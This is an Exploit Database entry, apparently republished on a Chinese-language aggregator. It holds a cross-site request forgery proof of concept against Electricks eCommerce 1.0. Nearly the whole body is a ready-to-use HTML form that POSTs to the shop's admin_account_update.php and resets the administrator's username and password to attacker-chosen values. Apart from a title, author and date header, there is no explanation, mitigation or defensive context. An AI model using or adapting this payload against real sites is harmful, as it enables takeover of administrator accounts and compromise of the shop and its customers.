Electricks eCommerce 1.0 – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 13 阅读

• 作者： Nawaf Alkeraithe
  日期： 2018-11-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45848/

• # Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
  # Date: 2018-11-12
  # Exploit Author: Nawaf Alkeraithe
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
  # Version: 1.0
  
  #PoC:
  
  <html><form enctype="application/x-www-form-urlencoded" method="POST"
  action="
  http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input
  type="text" value="4" name="user_id"></td></tr>
  <tr><td>firstname</td><td><input type="text" value="admin"
  name="firstname"></td></tr>
  <tr><td>lastname</td><td><input type="text" value="admin"
  name="lastname"></td></tr>
  <tr><td>email</td><td><input type="text" value="admin@admin.com"
  name="email"></td></tr>
  <tr><td>username</td><td><input type="text" value="admin"
  name="username"></td></tr>
  <tr><td>password</td><td><input type="text" value="NewPass"
  name="password"></td></tr>
  <tr><td>update</td><td><input type="text" value="" name="update"></td></tr>
  </table><input type="submit" value="Change Admin Password"></form></html>